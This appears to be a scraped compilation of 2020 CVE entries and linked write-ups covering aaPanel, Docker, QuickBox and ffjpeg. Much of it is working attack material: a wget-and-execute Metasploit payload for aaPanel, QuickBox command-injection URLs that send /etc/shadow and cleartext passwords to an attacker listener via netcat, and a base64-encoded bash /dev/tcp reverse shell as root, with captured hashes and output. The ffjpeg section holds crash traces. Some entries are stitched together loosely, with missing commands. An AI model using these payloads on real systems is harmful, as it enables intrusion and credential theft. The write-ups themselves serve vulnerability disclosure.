aaPanel through 6.6.6 allows remote authenticated users to execute arbitrary commands via the Script Content box on the Add Cron Job screen.

**aapanel****aapanel 6.6.6 - CVE-2020-14950**

*   Description : allows remote authenticated users to execute arbitrary commands via the setting menu of Sotfware Store.
*   Affected version : All <= 6.6.6

**Information**

To make this PoC, I just installed the software using docker-compose

*   Vulnerability Type : Remote command execution (Authenticated RCE)

**POC**

Go to Software Store, click on any row from the setting's field, intercept the request when you click on "start/stop/restart" and modify/edit the resquest to execute what you want. Here is an example with curl :

**aapanel 6.6.6 - CVE-2020-14421**

*   Description : Allows attacker to run arbitrary command remotely
*   Affected version : All <= 6.6.6

**Information**

To make this PoC, I just installed fresh Ubuntu 20.04, then I installed wget + sudo and executed this script wget -O install.sh http://www.aapanel.com/script/install-ubuntu_6.0_en.sh && sudo bash install.sh

*   Vulnerability Type : Remote command execution (RCE Authenticated)

**POC**

First of all, setup web\_delivery options, this will create a payload and a listener.

Now run it

this will generate the following payload:

wget -qO wt8v00sC --no-check-certificate http://xxxx:8088/gUVn1orp; chmod +x wt8v00sC; ./wt8v00sC& disown

Then copy/past like this into script content of crontab menu in aapanel.

Now just execute your crontab and wait your session.

**Fast Exploit**

Just run msfconsole -r aapanel.rc copy/paste the payload into script content section, and enjoy your session.

CVE-2020-14421: GitHub - jenaye/aapanel: aapanel 6.6.6 - (Authenticated) Remote Code Execution

An issue was discovered in Docker Engine before 19.03.11. An attacker in a container, with the CAP_NET_RAW capability, can craft IPv6 router advertisements, and consequently spoof external IPv6 hosts, obtain sensitive information, or cause a denial of service.

CVE-2020-13401: Docker Engine 23.0 release notes

QuickBox Community Edition through 2.5.5 and Pro Edition through 2.1.8 allows an authenticated remote attacker to execute code on the server via command injection in the servicestart parameter.

**Impact**

QuickBox CE <= v2.5.5 and QuickBox Pro <= 2.1.8 are both affected by an authenticated remote code execution (RCE) (_CVE-2020-13448_) and privilege escalation vulnerabilities (_CVE-2020-13694_ and _CVE-2020-13695_).  
A low-privileged user can execute arbitary commands on the server with the privileges of the user running the web server, and in turn escalate privileges to root by abusing weak sudo rules.

**What is QuickBox?**

QuickBox is a complete media server application and services management system, with a simplistic approach to achieving easy application installation and management from a beautifully designed dashboard, allowing users the ability to interact with their media server on a professional grade level.

**Versions affected**

*   QuickBox CE v2.5.5 and prior
*   QuickBox Pro v2.1.8 and prior

**Vulnerability**

Since this CVE covers two separate "versions" of QuickBox, with almost identical vulnerabilities, I have split the post into two parts; one for QuickBox CE and one for QuickBox Pro.

The vulnerability is located in the file `/inc/config.php`. This file is mainly used to setup configuration parameters to be used later by the application. At the end of this file we see that it also accept a GET parameter which will be used, unsanitized, in a call to `shell_exec`, leading to a command injection vulnerability.

Below is a snippet of the vulnerable code from`config.php`:

    switch (intval($_GET['id'])) {
    /* restart services */
    case 88:
      $process = $_GET['servicestart'];
        if ($process == "resilio-sync"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "shellinabox"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "emby-server"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "headphones"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "lidarr"){
          shell_exec("sudo systemctl stop $process");
          shell_exec("sudo systemctl disable $process");
        } elseif ($process == "nzbget"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "plexmediaserver"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "Tautulli"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "ombi"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "radarr"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "subsonic"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "transmission-daemon"){
          shell_exec("sudo systemctl enable $process");
          shell_exec("sudo systemctl restart $process");
        } elseif ($process == "qbittorrent"){
          shell_exec("sudo systemctl enable $process@$username");
          shell_exec("sudo systemctl restart $process@$username");
        } else {
          shell_exec("sudo systemctl restart $process@$username");
        }

Since we can control both `$_GET['id']` and `$_GET['servicestart']` we can inject our own commands into the last call to`shell_exec` and achieve remote code execution.

The complete vulnerable file can be found here: https://github.com/QuickBox/QB/blob/6f4253d82ccfdc85641fa6b27712569890687482/dashboard/inc/config.php

**Exploit**

Exploiting this vulnerability is pretty straight forward.

By sending a GET request to the following URL: `https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Dump /etc/shadow**

Upon further analysis we found that the www-data user can run quite a few commands and programs as root using sudo - _without a password_.  
One of the commands that can be executed is `grep`.  
But since the output of the command executed by `shell_exec`isn't displayed on the website, we won't see any output when trying to exfiltrate sensitive information.

One way to get a around this limitation is to use grep to write the contents of `/etc/shadow` to a file we can read from and use netcat to send the file back to our listener.

If we setup a netcat listener and visit the following URL we can trigger the exploit and receive the output of `/etc/shadow`:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+.+/etc/shadow+>pwds;nc+<OUR-IP-ADDRESS>+9001+<+pwds;rm+pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 58814
    root:$6$lYAppqO4$ParMSRU7IDtSULWHfA4sy8iQCm9/nJP.RksoLau0zBHp0VPbOfYBipZlcQ8VVvnvArRC37r3y/hBLgYRDZ5:18406:0:99999:7:::
    daemon:*:17920:0:99999:7:::
    bin:*:17920:0:99999:7:::
    sys:*:17920:0:99999:7:::
    sync:*:17920:0:99999:7:::
    games:*:17920:0:99999:7:::
    man:*:17920:0:99999:7:::
    lp:*:17920:0:99999:7:::
    mail:*:17920:0:99999:7:::
    news:*:17920:0:99999:7:::
    uucp:*:17920:0:99999:7:::
    proxy:*:17920:0:99999:7:::
    www-data:*:17920:0:99999:7:::
    backup:*:17920:0:99999:7:::
    list:*:17920:0:99999:7:::
    irc:*:17920:0:99999:7:::
    gnats:*:17920:0:99999:7:::
    nobody:*:17920:0:99999:7:::
    systemd-timesync:*:17920:0:99999:7:::
    systemd-network:*:17920:0:99999:7:::
    systemd-resolve:*:17920:0:99999:7:::
    systemd-bus-proxy:*:17920:0:99999:7:::
    syslog:*:17920:0:99999:7:::
    _apt:*:17920:0:99999:7:::
    postfix:*:17920:0:99999:7:::
    sshd:*:17920:0:99999:7:::
    uuidd:*:17920:0:99999:7:::
    messagebus:*:17920:0:99999:7:::
    s1gh:$6$hf2vF79G$APAqRRKp4Jax27xzZE1npHlumLWaDsgaHo3z/Sw6Z3tEnemam9h.EB1pXFx1Jy9mZ/jqaQoTBlL7TphlAZb210:18406:0:99999:7:::
    memcache:!:18406:0:99999:7:::
    vnstat:*:18406:0:99999:7:::
    debian-deluged:*:18406:0:99999:7:::
    ftp:*:18406:0:99999:7:::
    shellinabox:*:18406:0:99999:7:::
    test:$6$qPhsfmxz$Jm529ZLBiigWAhcRO3svLm4HLRFZsYgkWso0dTa2d6Bxb8UJd6LuCI1AVaOutXVheu2Z2iWugRQFQLeZGCecp.:18406:0:99999:7:::
    s1gh2:$6$zaGzrHfj$1Qgs5AWlruq2YJpPFs6TjO2QNtd.WpiAV7WMV9aQE1nJKAC1LdYTh/52/HkvBeYkBhzob/E1q6JwJp6zKGRHx.:18406:0:99999:7:::
    

**Privilege escalation**

Investigating further we found that the cleartext password of every QuickBox CE user is stored in \*.db files in `/root`.  
Since we can run `grep` as root we can dump all admin and non-admin passwords, and exfiltrate the passwords in the same way we did with `/etc/shadow`. This in turn gives us a way to escalate our privileges to that of the admin user. And since the admin user can `sudo su` without a password, we can now gain root access.

To trigger the exploit, setup a netcat listener and visit the following URL:  
`https://<QUICKBOX-CE-IP-ADDRESS>/inc/config.php?id=88&servicestart=a;sudo+grep+-R+.+/root/+--include="*.info">pwds;nc+<OUR-IP-ADDRESS>+9001<pwds;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 59136
    /root/s1gh2.info:s1gh2 : Password1234 
    /root/s1gh2.info:1GB
    /root/information.info:  Seedbox can be found at https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/information.info:  If you need to restart rtorrent/irssi, you can type 'reload'
    /root/information.info:  https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)
    /root/test.info:test : test 
    /root/test.info:1GB
    /root/s1gh.info:#   https://s1gh:Password1234@192.168.1.250 (Also works for FTP:5757/SSH:4747)

The information.info file will contain the admin user credentials. In this case: `https://_s1gh_:_Password1234_@192.168.1.250 (Also works for FTP:5757/SSH:4747)`

With these credentials we can now ssh into the server and escalate our privileges to the root user.

    s1gh@kali~$: ssh s1gh@192.168.1.250 -p 4747
    s1gh@192.168.1.250's password: 
    Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 5.3.18-3-pve x86_64)
    
     * Documentation:  https://help.ubuntu.com
     * Management:     https://landscape.canonical.com
     * Support:        https://ubuntu.com/advantage
    
    
    2 packages can be updated.
    0 updates are security updates.
    
    New release '18.04.4 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.
    
    Last login: Sun May 24 20:53:02 2020 from 192.168.1.126
     Welcome Back !
        * Dashboard:  https://192.168.1.250
        * Support:    https://plaza.quickbox.io
        * Donate:     https://quickbox.io/donate
    
    [s1gh@Ubuntu1604]:(0b)~$ sudo su
    
    
    |========================================================================|
    |------------------------------------------------------------------------|
    |  ###################   This Server is OFF limits   ####################|
    |------------------------------------------------------------------------|
         You are running QuickBox v2.5.5
         Your logged IP is 192.168.1.126:0.0
         Your BASH version is 4.3
         Mon May 25 21:16:30 UTC 2020
    |========================================================================|
    
    
    Ubuntu1604:/home/s1gh# whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**QuickBox Pro**

Due to a partially shared code base between CE and Pro, exactly the same command injection vulnerability can be found in the Pro version.  
The only difference is that `/inc/config.php` no longer exist and part of the source code is encrypted, so we had to manually find the injection point.

After a while we found the injection point in `index.php`.  
The exact same parameters as with the CE version can be abused to achieve RCE.

**Exploit**

By sending a GET request to the following URL: `https://<QUICKBOX-PRO-IP-ADDRESS>/index.php?id=88&servicestart=a;<COMMAND-HERE>;` the command is executed on the server as the www-data user.

**Privilege Escalation**

Since the www-data user can execute `sudo mysql` without a password, we can modify our GET request in such a way that we get a reverse shell as root instantly instead of first getting a shell as the www-data user and then doing the privilege escalation.

Our reverse shell will have a few "bad characters", so first we create a base64 encoded string of the following reverse shell: `bash -i >& /dev/tcp/<YOUR-IP>/<YOUR-PORT> 0>&1`

    s1gh@kali~$: echo -n "sudo mysql -e '\! /bin/bash -c \"bash -i >& /dev/tcp/192.168.1.126/9001 0>&1\"'" | base64
    c3VkbyBteXNxbCAtZSAnXCEgL2Jpbi9iYXNoIC1jICJiYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xMjYvOTAwMSAwPiYxIic=

Now that we have the base64 encoded reverse shell, we can visit the following url in order to trigger the exploit (_remember to first setup a netcat listener on your chosen port_):

`https://<QUICKBOX-PRO-IP-ADDRESS>?id=88&servicestart=a;echo+<BASE64-ENCODED-STRING>|base64+-d|bash;`

    s1gh@kali~$: nc -lvnp 9001
    listening on [any] 9001 ...
    connect to [192.168.1.126] from (UNKNOWN) [192.168.1.250] 46862                 
    bash: cannot set terminal process group (135): Inappropriate ioctl for device   
    bash: no job control in this shell                        
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.5.5                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:25 UTC 2020                         
    |========================================================================|                                           
    
    
    
    
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  ###################   This Server is OFF limits   ####################|                                           
    |------------------------------------------------------------------------|                                           
         You are running QuickBox v2.1.8                      
         Your logged IP is :0.0                               
         Your BASH version is 4.4                             
         Fri May 29 07:30:26 UTC 2020                         
    |========================================================================|                                           
    |========================================================================|                                           
    |------------------------------------------------------------------------|                                           
    |  Just type any one of the following commands                           |                                           
    |  to turn on different bash prompts                                     |                                           
    |------------------------------------------------------------------------|                                           
    |  commandprompt_on                                                      |                                           
    |  this prompt shows last command used & more                            |                                           
    |  powerprompt_on (default)                                              |                                           
    |  this prompt shows colorful system data - cpu, load etc.               |                                           
    |  basicprompt_on                                                        |                                           
    |  this prompt shows color coded load & cpu avg                          |                                           
    |  prompt_OFF                                                            |                                           
    |  this turns off prompts and goes back to default                       |                                           
    |========================================================================|                                           
    
    
    380/2048MB      0.99 1.35 1.60 1/817 6682                 
    [21016:21015 0:37] 07:30:26 Fri May 29 [root@QB-PRO] /srv/quickbox                                                   
    (2:37)# whoami;id                                         
    whoami;id
    root
    uid=0(root) gid=0(root) groups=0(root)

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13448
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13694
*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13695
*   https://www.exploit-db.com/exploits/48536
*   https://github.com/s1gh/QuickBox-CE-2.5.5-Authenticated-RCE

CVE-2020-13448: CVE-2020-13448 - QuickBox -  Authenticated RCE/Privilege Escalation

A NULL pointer dereference in sanei_epson_net_read in SANE Backends before 1.0.30 allows a malicious device connected to the same local network as the victim to cause a denial of service, aka GHSL-2020-075.

CVE-2020-12867: memory corruption bugs in libsane (#279) · Issues · sane-project / backends · GitLab

ffjpeg through 2020-02-24 has an invalid read in jfif_encode in jfif.c.

Tested in Ubuntu 16.04, 64bit.

The testcase is segv\_ffjpeg\_e2.

I use the following command:

and get:

I use **valgrind** to analysis the bug and get the below information (absolute path information omitted):

    ==12529== Memcheck, a memory error detector
    ==12529== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
    ==12529== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
    ==12529== Command: ffjpeg -e segv_ffjpeg_e2
    ==12529== 
    ==12529== Argument 'size' of function malloc has a fishy (possibly negative) value: -2097127520
    ==12529==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==12529==    by 0x4015EB: bmp_load (bmp.c:52)
    ==12529==    by 0x400F2B: main (ffjpeg.c:29)
    ==12529== 
    ==12529== Invalid read of size 1
    ==12529==    at 0x40C930: jfif_encode (jfif.c:748)
    ==12529==    by 0x400F33: main (ffjpeg.c:30)
    ==12529==  Address 0x0 is not stack'd, malloc'd or (recently) free'd
    ==12529== 
    ==12529== 
    ==12529== Process terminating with default action of signal 11 (SIGSEGV)
    ==12529==  Access not within mapped region at address 0x0
    ==12529==    at 0x40C930: jfif_encode (jfif.c:748)
    ==12529==    by 0x400F33: main (ffjpeg.c:30)
    ==12529==  If you believe this happened as a result of a stack
    ==12529==  overflow in your program's main thread (unlikely but
    ==12529==  possible), you can try to increase the size of the
    ==12529==  main thread stack using the --main-stacksize= flag.
    ==12529==  The main thread stack size used in this run was 8388608.
    ==12529== 
    ==12529== HEAP SUMMARY:
    ==12529==     in use at exit: 33,643,096 bytes in 12 blocks
    ==12529==   total heap usage: 14 allocs, 2 frees, 33,647,744 bytes allocated
    ==12529== 
    ==12529== LEAK SUMMARY:
    ==12529==    definitely lost: 0 bytes in 0 blocks
    ==12529==    indirectly lost: 0 bytes in 0 blocks
    ==12529==      possibly lost: 0 bytes in 0 blocks
    ==12529==    still reachable: 33,643,096 bytes in 12 blocks
    ==12529==         suppressed: 0 bytes in 0 blocks
    ==12529== Rerun with --leak-check=full to see details of leaked memory
    ==12529== 
    ==12529== For counts of detected and suppressed errors, rerun with: -v
    ==12529== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
    Segmentation fault
    

The gdb reports:

    Starting program: ffjpeg -e segv_ffjpeg_e2
    
    Program received signal SIGSEGV, Segmentation fault.
    
    [----------------------------------registers-----------------------------------]
    RAX: 0x3f800010 
    RBX: 0x7ffff000e3e0 --> 0x0 
    RCX: 0xff 
    RDX: 0x7f000020 
    RSI: 0x3f800010 
    RDI: 0xfe000040 
    RBP: 0x7ffff00103f0 --> 0x0 
    RSP: 0x7fffffffd6e0 --> 0x7fffffffd8c0 --> 0xff7f000020 
    RIP: 0x40c930 (<jfif_encode+1968>:	movzx  edx,BYTE PTR [r14])
    R8 : 0x1fc000080 
    R9 : 0x7ffff00063d0 --> 0x0 
    R10: 0x7fffffffd8c0 --> 0xff7f000020 
    R11: 0x7ffff0004ecc --> 0x105010000000000 
    R12: 0x7ffff00063d0 --> 0x0 
    R13: 0x7fffffffd770 --> 0x0 
    R14: 0x0 
    R15: 0x0
    EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x40c91c <jfif_encode+1948>:	mov    rdx,QWORD PTR [rsp]
       0x40c920 <jfif_encode+1952>:	lea    rsp,[rsp+0x98]
       0x40c928 <jfif_encode+1960>:	nop    DWORD PTR [rax+rax*1+0x0]
    => 0x40c930 <jfif_encode+1968>:	movzx  edx,BYTE PTR [r14]
       0x40c934 <jfif_encode+1972>:	movzx  esi,BYTE PTR [r14+0x1]
       0x40c939 <jfif_encode+1977>:	mov    rcx,r12
       0x40c93c <jfif_encode+1980>:	movzx  edi,BYTE PTR [r14+0x2]
       0x40c941 <jfif_encode+1985>:	mov    r9,rbp
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffffd6e0 --> 0x7fffffffd8c0 --> 0xff7f000020 
    0008| 0x7fffffffd6e8 --> 0x7fff00000000 
    0016| 0x7fffffffd6f0 --> 0x1fc000080 
    0024| 0x7fffffffd6f8 --> 0xfe000040 
    0032| 0x7fffffffd700 --> 0x7fff00000100 
    0040| 0x7fffffffd708 --> 0x7f000020 
    0048| 0x7fffffffd710 --> 0x7ffff00008c0 --> 0xff7f000020 
    0056| 0x7fffffffd718 --> 0xff000000ff00 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGSEGV
    jfif_encode (pb=pb@entry=0x7fffffffd8c0) at jfif.c:748
    748	            rgb_to_yuv(bsrc[2], bsrc[1], bsrc[0], ydst, udst, vdst);
    gdb-peda$ bt
    #0  jfif_encode (pb=pb@entry=0x7fffffffd8c0) at jfif.c:748
    #1  0x0000000000400f34 in main (argc=argc@entry=0x3, argv=argv@entry=0x7fffffffd9c8)
        at ffjpeg.c:30
    #2  0x00007ffff7a2d830 in __libc_start_main (main=0x400be0 <main>, argc=0x3, 
        argv=0x7fffffffd9c8, init=<optimized out>, fini=<optimized out>, 
        rtld_fini=<optimized out>, stack_end=0x7fffffffd9b8) at ../csu/libc-start.c:291
    #3  0x0000000000401019 in _start ()
    

An attacker can exploit this vulnerability by submitting a malicious bmp that exploits this bug which will result in a Denial of Service (DoS).

CVE-2020-13438: SEGV in function jfif_encode in jfif.c:748 · Issue #23 · rockcarry/ffjpeg

ffjpeg through 2020-02-24 has a heap-based buffer over-read in jfif_decode in jfif.c.

Tested in Ubuntu 16.04, 64bit.

The tesecase is heap-buffer-overflow\_ffjpeg\_d1.

I use the following command:

    ffjpeg -d heap-buffer-overflow_ffjpeg_d1
    

and get:

I use **valgrind** to analysis the bug and get the below information (absolute path information omitted):

    ==22952== Memcheck, a memory error detector
    ==22952== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
    ==22952== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info
    ==22952== Command: ffjpeg -d heap-buffer-overflow_ffjpeg_d1
    ==22952== 
    ==22952== Conditional jump or move depends on uninitialised value(s)
    ==22952==    at 0x40E6D0: yuv_to_rgb (color.c:26)
    ==22952==    by 0x40BB0F: jfif_decode (jfif.c:546)
    ==22952==    by 0x400E3A: main (ffjpeg.c:24)
    ==22952== 
    ==22952== Conditional jump or move depends on uninitialised value(s)
    ==22952==    at 0x40E759: yuv_to_rgb (color.c:27)
    ==22952==    by 0x40BB0F: jfif_decode (jfif.c:546)
    ==22952==    by 0x400E3A: main (ffjpeg.c:24)
    ==22952== 
    ==22952== Conditional jump or move depends on uninitialised value(s)
    ==22952==    at 0x40E646: yuv_to_rgb (color.c:25)
    ==22952==    by 0x40BB0F: jfif_decode (jfif.c:546)
    ==22952==    by 0x400E3A: main (ffjpeg.c:24)
    ==22952== 
    ==22952== Invalid read of size 4
    ==22952==    at 0x40BB00: jfif_decode (jfif.c:546)
    ==22952==    by 0x400E3A: main (ffjpeg.c:24)
    ==22952==  Address 0x521f058 is 0 bytes after a block of size 21,384 alloc'd
    ==22952==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==22952==    by 0x409DB9: jfif_decode (jfif.c:443)
    ==22952==    by 0x400E3A: main (ffjpeg.c:24)
    ==22952== 
    ==22952== Syscall param write(buf) points to uninitialised byte(s)
    ==22952==    at 0x4F312C0: __write_nocancel (syscall-template.S:84)
    ==22952==    by 0x4EB2BFE: _IO_file_write@@GLIBC_2.2.5 (fileops.c:1263)
    ==22952==    by 0x4EB4408: new_do_write (fileops.c:518)
    ==22952==    by 0x4EB4408: _IO_do_write@@GLIBC_2.2.5 (fileops.c:494)
    ==22952==    by 0x4EB347C: _IO_file_xsputn@@GLIBC_2.2.5 (fileops.c:1331)
    ==22952==    by 0x4EA87BA: fwrite (iofwrite.c:39)
    ==22952==    by 0x401AE2: bmp_save (bmp.c:97)
    ==22952==    by 0x400E4F: main (ffjpeg.c:26)
    ==22952==  Address 0x52dffe8 is 56 bytes inside a block of size 4,096 alloc'd
    ==22952==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==22952==    by 0x4EA71D4: _IO_file_doallocate (filedoalloc.c:127)
    ==22952==    by 0x4EB5593: _IO_doallocbuf (genops.c:398)
    ==22952==    by 0x4EB48F7: _IO_file_overflow@@GLIBC_2.2.5 (fileops.c:820)
    ==22952==    by 0x4EB328C: _IO_file_xsputn@@GLIBC_2.2.5 (fileops.c:1331)
    ==22952==    by 0x4EA87BA: fwrite (iofwrite.c:39)
    ==22952==    by 0x401A30: bmp_save (bmp.c:93)
    ==22952==    by 0x400E4F: main (ffjpeg.c:26)
    ==22952== 
    ==22952== Syscall param write(buf) points to uninitialised byte(s)
    ==22952==    at 0x4F312C0: __write_nocancel (syscall-template.S:84)
    ==22952==    by 0x4EB2BFE: _IO_file_write@@GLIBC_2.2.5 (fileops.c:1263)
    ==22952==    by 0x4EB4408: new_do_write (fileops.c:518)
    ==22952==    by 0x4EB4408: _IO_do_write@@GLIBC_2.2.5 (fileops.c:494)
    ==22952==    by 0x4EB39AF: _IO_file_close_it@@GLIBC_2.2.5 (fileops.c:165)
    ==22952==    by 0x4EA73EE: fclose@@GLIBC_2.2.5 (iofclose.c:58)
    ==22952==    by 0x401B63: bmp_save (bmp.c:99)
    ==22952==    by 0x400E4F: main (ffjpeg.c:26)
    ==22952==  Address 0x52dffb0 is 0 bytes inside a block of size 4,096 alloc'd
    ==22952==    at 0x4C2DB8F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==22952==    by 0x4EA71D4: _IO_file_doallocate (filedoalloc.c:127)
    ==22952==    by 0x4EB5593: _IO_doallocbuf (genops.c:398)
    ==22952==    by 0x4EB48F7: _IO_file_overflow@@GLIBC_2.2.5 (fileops.c:820)
    ==22952==    by 0x4EB328C: _IO_file_xsputn@@GLIBC_2.2.5 (fileops.c:1331)
    ==22952==    by 0x4EA87BA: fwrite (iofwrite.c:39)
    ==22952==    by 0x401A30: bmp_save (bmp.c:93)
    ==22952==    by 0x400E4F: main (ffjpeg.c:26)
    ==22952== 
    ==22952== 
    ==22952== HEAP SUMMARY:
    ==22952==     in use at exit: 0 bytes in 0 blocks
    ==22952==   total heap usage: 19 allocs, 19 frees, 9,423,684 bytes allocated
    ==22952== 
    ==22952== All heap blocks were freed -- no leaks are possible
    ==22952== 
    ==22952== For counts of detected and suppressed errors, rerun with: -v
    ==22952== Use --track-origins=yes to see where uninitialised values come from
    ==22952== ERROR SUMMARY: 776684 errors from 6 contexts (suppressed: 0 from 0)
    
    

I use **AddressSanitizer** to build ffjpeg and running it with the following command:

    ffjpeg -e heap-buffer-overflow_ffjpeg_d1
    

This is the ASAN information (absolute path information omitted):

    =================================================================
    ==687==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000efd0 at pc 0x000000405c60 bp 0x7ffccf9b8f90 sp 0x7ffccf9b8f80
    READ of size 4 at 0x60200000efd0 thread T0
        #0 0x405c5f in jfif_decode ffjpeg/src/jfif.c:546
        #1 0x401233 in main (ffjpeg/src/ffjpeg+0x401233)
        #2 0x7f0380f4582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
        #3 0x4010c8 in _start (ffjpeg/src/ffjpeg+0x4010c8)
    
    0x60200000efd1 is located 0 bytes to the right of 1-byte region [0x60200000efd0,0x60200000efd1)
    allocated by thread T0 here:
        #0 0x7f0381387662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662)
        #1 0x404c01 in jfif_decode ffjpeg/src/jfif.c:444
        #2 0x401233 in main (ffjpeg/src/ffjpeg+0x401233)
        #3 0x7f0380f4582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ffjpeg/src/jfif.c:546 jfif_decode
    Shadow bytes around the buggy address:
      0x0c047fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c047fff9df0: fa fa fa fa fa fa fa fa fa fa[01]fa fa fa 01 fa
      0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c047fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Heap right redzone:      fb
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack partial redzone:   f4
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
    ==687==ABORTING
    

The gdb reports (absolute path information omitted)::

    Starting program: ffjpeg -d heap-buffer-overflow_ffjpeg_d1
    
    Program received signal SIGSEGV, Segmentation fault.
    
    [----------------------------------registers-----------------------------------]
    RAX: 0x82f4 
    RBX: 0x7ffff77cd47c --> 0x0 
    RCX: 0x7ffff7f5b420 --> 0x0 
    RDX: 0x215c5400 ('')
    RSI: 0xe 
    RDI: 0x0 
    RBP: 0x8480 
    RSP: 0x7fffffffd570 --> 0x0 
    RIP: 0x40bb00 (<jfif_decode+11520>:	mov    esi,DWORD PTR [r9+rax*4])
    R8 : 0x7ffff7f5b41f --> 0x0 
    R9 : 0x622430 --> 0x0 
    R10: 0xff 
    R11: 0x215c5400 ('')
    R12: 0x7ffff7f5b41e --> 0x0 
    R13: 0x622010 --> 0x202000000020 (' ')
    R14: 0x1b 
    R15: 0xe8a
    EFLAGS: 0x10212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x40baf6 <jfif_decode+11510>:	mov    edx,r11d
       0x40baf9 <jfif_decode+11513>:	cdqe   
       0x40bafb <jfif_decode+11515>:	add    rax,QWORD PTR [rsp+0x10]
    => 0x40bb00 <jfif_decode+11520>:	mov    esi,DWORD PTR [r9+rax*4]
       0x40bb04 <jfif_decode+11524>:	mov    r9,r12
       0x40bb07 <jfif_decode+11527>:	add    r12,0x3
       0x40bb0b <jfif_decode+11531>:	call   0x40e5c0 <yuv_to_rgb>
       0x40bb10 <jfif_decode+11536>:	mov    ecx,DWORD PTR [r13+0x0]
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffffd570 --> 0x0 
    0008| 0x7fffffffd578 --> 0x200 
    0016| 0x7fffffffd580 --> 0x82da 
    0024| 0x7fffffffd588 --> 0x6221d0 --> 0xe0000000e 
    0032| 0x7fffffffd590 --> 0xe00000000 
    0040| 0x7fffffffd598 --> 0x680000000e 
    0048| 0x7fffffffd5a0 --> 0x7ffff71eb010 --> 0xe8db8effba253b 
    0056| 0x7fffffffd5a8 --> 0x4a00000080 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
